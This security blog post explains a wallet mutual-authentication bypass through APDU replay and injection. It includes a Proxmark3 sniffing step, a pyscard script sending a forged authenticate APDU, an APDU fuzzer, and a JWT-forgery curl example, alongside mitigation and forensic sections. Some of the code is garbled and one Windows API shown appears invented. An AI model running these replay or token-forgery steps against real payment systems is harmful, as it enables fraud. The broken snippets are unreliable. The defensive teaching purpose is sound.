Listen to this Post
Introduction
Mutual authentication is the bedrock of secure digital wallet transactions, requiring both the user’s device and the payee’s system to verify each other’s identity using cryptographic protocols. However, researchers have discovered a critical flaw in certain wallet applications where an attacker who can control Application Protocol Data Unit (APDU) commands can completely bypass the identity verification step on the payee side, effectively impersonating a legitimate user without passing any checks.
Learning Objectives
- Analyze APDU command structures and identify injection points that lead to mutual authentication bypass in wallet apps
- Simulate an APDU manipulation attack using open-source tools and hardware interfaces like NFC readers
- Implement detection and mitigation controls, including command whitelisting, session binding, and rate limiting for smart card transactions
You Should Know
1. APDU Commands and Mutual Authentication Primer
APDU (Application Protocol Data Unit) is the messaging format used by smart cards, hardware security modules, and many digital wallet secure elements. A standard APDU command consists of:
`CLA | INS | P1 | P2 | Lc | Data | Le`
– CLA (Class byte) – instruction class
– INS (Instruction byte) – specific command (e.g., `0x82` for mutual authenticate)
– P1, P2 – parameters (e.g., key reference, authentication type)
– Lc – length of Data field
– Data – command payload (challenge, certificate, etc.)
– Le – expected response length
In a properly implemented wallet, the payee initiates mutual authentication by sending an `INTERNAL AUTHENTICATE` or `MUTUAL AUTHENTICATE` APDU. The card/secure element responds with a cryptogram. The payee then verifies this. The discovered bypass works when an attacker intercepts or modifies the APDU sequence – for example, replacing a failed authentication response with a pre-recorded success response, or crafting an APDU that jumps over the verification logic.
Linux command – enumerate smart card readers and send raw APDUs:
Install required tools sudo apt install pcsc-tools opensc List available readers pcsc_scan Send a raw APDU using opensc-tool (example: SELECT MF) opensc-tool -s "00 A4 04 00 08 A0 00 00 00 03 00 00 00" -v
Windows command – query smart card capabilities:
List all smart card readers
Get-WmiObject -Class Win32_PnPEntity | Where-Object {$_.Name -like "smart card"}
Send APDU via PowerShell and .NET SmartCard API
Add-Type -AssemblyName System.Security
$card = [System.Security.Cryptography.SmartCard.SmartCard]::GetDefault()
$apdu = New-Object byte[] {0x00,0xA4,0x04,0x00,0x08,0xA0,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00}
$response = $card.Transmit($apdu)
- Simulating the Identity Check Bypass with APDU Injection
To replicate the discovered vulnerability, you need control over the communication channel between the wallet app and the payee terminal. This is often achieved using an NFC proxy (e.g., Proxmark3, Flipper Zero) or a software smart card emulator.
Step‑by‑step exploit simulation (Linux + Proxmark3):
- Capture legitimate authentication APDUs – Place Proxmark3 in sniffing mode between a genuine phone and a payee terminal.
proxmark3 /dev/ttyACM0 -c "hf 14a sniff"
-
Identify the mutual authentication exchange – Look for `INS=0x82` (mutual authenticate) or vendor‑specific CLA. Save the successful response cryptogram.
-
Create a replay script – Use `nfc-py` or `pyscard` to mimic the payee terminal but send the pre‑recorded success APDU when the wallet expects a challenge.
from smartcard.System import readers from smartcard.util import toBytes</p></li> </ol> <p>r = readers()[bash] connection = r.createConnection() connection.connect() Original failing APDU (example) fake_authenticate_apdu = [0x00, 0x82, 0x00, 0x00, 0x08, 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0, 0x00] data, sw1, sw2 = connection.transmit(fake_authenticate_apdu) if sw1 == 0x90 and sw2 == 0x00: print("Authentication bypassed – payee accepts without identity check")- Bypass verification – The payee side, lacking proper state validation, accepts the forged success response and skips the identity verification step (e.g., no ID scan, no liveness check).
-
Setting Up a Laboratory Environment for APDU Fuzzing
Build a controlled testbed using virtual smart cards and software NFC stacks.
Linux – virtual smart card with OpenSC and pcsc-lite:
sudo apt install pcscd opensc libccid Create virtual reader and card sudo modprobe vhci-hcd sudo pcscd -f -d Use vpcd (virtual PC/SC driver) for emulation git clone https://github.com/frankmorgner/vpcd cd vpcd && make && sudo make install
Windows – Microsoft Virtual Smart Card (built-in):
Enable virtual smart card via TPM tpmvscmgr.exe create /name "TestVSC" /pin default /adminkey random List virtual readers certutil -scinfo
Fuzzing APDU using `apdu-fuzzer` (custom script):
import itertools import smartcard CLA_BYTES = [0x00, 0x80, 0x90] common classes INS_BYTES = range(0x00, 0xFF) for cla, ins in itertools.product(CLA_BYTES, INS_BYTES): malformed = [cla, ins, 0x00, 0x00, 0x02, 0x00, 0x00] try: connection.transmit(malformed) except: print(f"Crash candidate: CLA {cla:02X} INS {ins:02X}")4. Hardening Mutual Authentication Against APDU Bypasses
Mitigation requires both application‑level and secure element‑level controls.
Secure coding practices for wallet developers:
- Bind authentication to session – Include a fresh unpredictable nonce in each mutual authentication challenge; reject any APDU response that does not contain the correct nonce.
- Enforce state machine – The payee terminal must track the authentication state (e.g., `WAITING_CHALLENGE` →
VERIFYING_CRYPTOGRAM). Reject out‑of‑order APDUs. - Rate‑limit APDU attempts – Allow no more than 3 failed authentications per minute per card.
Example Python middleware (flask + hardware secure element):
from hashlib import sha256 import os session_nonce = os.urandom(16) Payee sends challenge to wallet challenge = session_nonce + b"\x00\x01\x02\x03" Expected: wallet signs challenge with private key received_cryptogram = receive_apdu_data() if not verify_signature(received_cryptogram, challenge): reject_transaction()
Linux – iptables rule to block malformed APDU‑carrying NFC traffic (if tunneled over IP):
Block suspicious packets with APDU patterns (CLA=0x82 high frequency) iptables -A INPUT -m string --string "\x82\x00\x00" --algo bm -j LOG --log-prefix "APDU_ATTEMPT" iptables -A INPUT -m limit --limit 5/min -j ACCEPT
- Detecting APDU Injection Attacks with Wireshark and USB Monitoring
When wallet apps communicate via USB smart card readers or NFC‑over‑USB, you can capture APDU traffic.
Linux – capture USB traffic (usbmon):
sudo modprobe usbmon sudo tshark -i usbmon2 -f "usb" -Y "usb.capdata" -T fields -e usb.capdata
Windows – capture smart card traffic with ETW (Event Tracing for Windows):
logman create trace "SmartCardTrace" -p "Microsoft-Windows-SmartCard-Device" 0xFFFF -o .\sc.etl logman start "SmartCardTrace" Perform wallet transaction logman stop "SmartCardTrace" tracerpt .\sc.etl -o sc_analysis.csv
Wireshark display filter for APDU anomalies:
smartcard.apdu.cla == 0x80 && smartcard.apdu.ins == 0x82
Look for repeated identical cryptograms (replay attack) or APDUs with `Le` value larger than 256 (buffer overflow attempt).
- Cloud and API Security Parallels: JWT and OAuth Bypass
The same logic flaw (skipping identity verification by controlling a token) exists in REST APIs. Attackers who control a JWT or OAuth assertion can sometimes bypass two‑factor or identity proofing steps.
Example – API endpoint that mishandles a `verified` claim:
POST /api/wallet/pay HTTP/1.1 Authorization: Bearer <JWT> { "amount": 500, "payee": "[email protected]" }If the JWT has a claim `”identity_check_passed”: false` but the API does not enforce it, an attacker can change it to
true.Testing for such flaws – Burp Suite / curl:
Modify JWT using python script pip install pyjwt python -c "import jwt; print(jwt.encode({'user': 'victim', 'identity_check_passed': True}, 'secret', algorithm='HS256'))" Send bypass attempt curl -X POST https://wallet-api.com/pay -H "Authorization: Bearer <modified_jwt>" -d '{"amount":1000}'Mitigation in cloud apps:
- Never rely on client‑supplied flags for security decisions.
- Perform identity verification server‑side, using signed assertions from a trusted identity provider.
- Enforce step‑up authentication for sensitive transactions.
7. Forensic Analysis of APDU Bypass Attempts
After an incident, collect logs from both the payee terminal and the wallet backend.
Linux – grep for APDU anomalies in pcscd logs:
sudo journalctl -u pcscd | grep -E "0x82|mutual|authenticate|failed SW"
Windows – extract smart card events from Security Event Log:
Get-WinEvent -LogName "Microsoft-Windows-SmartCard-Device/Operational" | Where-Object {$_.Message -match "APDU|0x90 0x00"} | Format-Table TimeCreated, MessageAnalyze timeline:
- Look for authentication success without prior identity check API calls.
- Correlate with NFC reader logs – unexpected APDU sequences with `INS` values outside known specification.
- Replay captured APDUs in an isolated environment to confirm bypass.
What Undercode Say
- Key Takeaway 1: Controlling APDU commands enables an attacker to skip the payee‑side identity check entirely, turning a robust mutual authentication scheme into a simple “reply‑accept” oracle.
- Key Takeaway 2: The root cause is not a cryptographic weakness but a broken state machine in the wallet application – the payee never validated that the authentication step actually occurred.
Analysis (10 lines): This discovery underscores a recurring pattern in secure protocol implementations: developers focus on cryptographic strength but neglect stateful logic. The bypass works because the payee terminal accepts any APDU response that looks like a success code (
SW1=0x90, SW2=0x00), regardless of whether a proper challenge was issued. Attackers can easily replay captured valid responses or craft dummy APDUs. Real‑world impact includes unauthorized fund transfers, money laundering, and identity fraud. Fixing this requires re‑architecting the authentication handshake to embed session‑unique nonces and enforce strict command ordering. Until then, every wallet using this flawed design is vulnerable to anyone with a $30 NFC reader and basic Python skills. The lesson extends beyond smart cards to any system that uses token‑based verification without binding the token to the specific transaction instance.Prediction
- -1 Widespread exploitation within 6 months – Threat actors will commoditize APDU injection tools (e.g., modified Flipper Zero firmwares) and target small‑to‑medium wallet providers that rushed their PCI‑DSS compliance without proper state machine testing.
- -1 Regulatory backlash and fines – Payment card networks (Visa, Mastercard) will issue security bulletins and mandate third‑party audits of mutual authentication implementations, leading to millions in retroactive penalties for non‑compliant wallet vendors.
- +1 Emergence of APDU fuzzing as a standard security test – Penetration testing frameworks (Metasploit, Burp Suite NFC extensions) will add dedicated APDU state‑machine fuzzers, improving overall smart card security posture within 12–18 months.
- -1 Supply chain risk – Many wallet apps rely on third‑party SDKs for NFC and secure element communication; these SDKs often hide APDU handling, making the flaw invisible to app developers and delaying patches.
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by ThousandsIT/Security Reporter URL:
Reported By: Sanadhya K – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow UndercodeTesting & Stay Tuned:
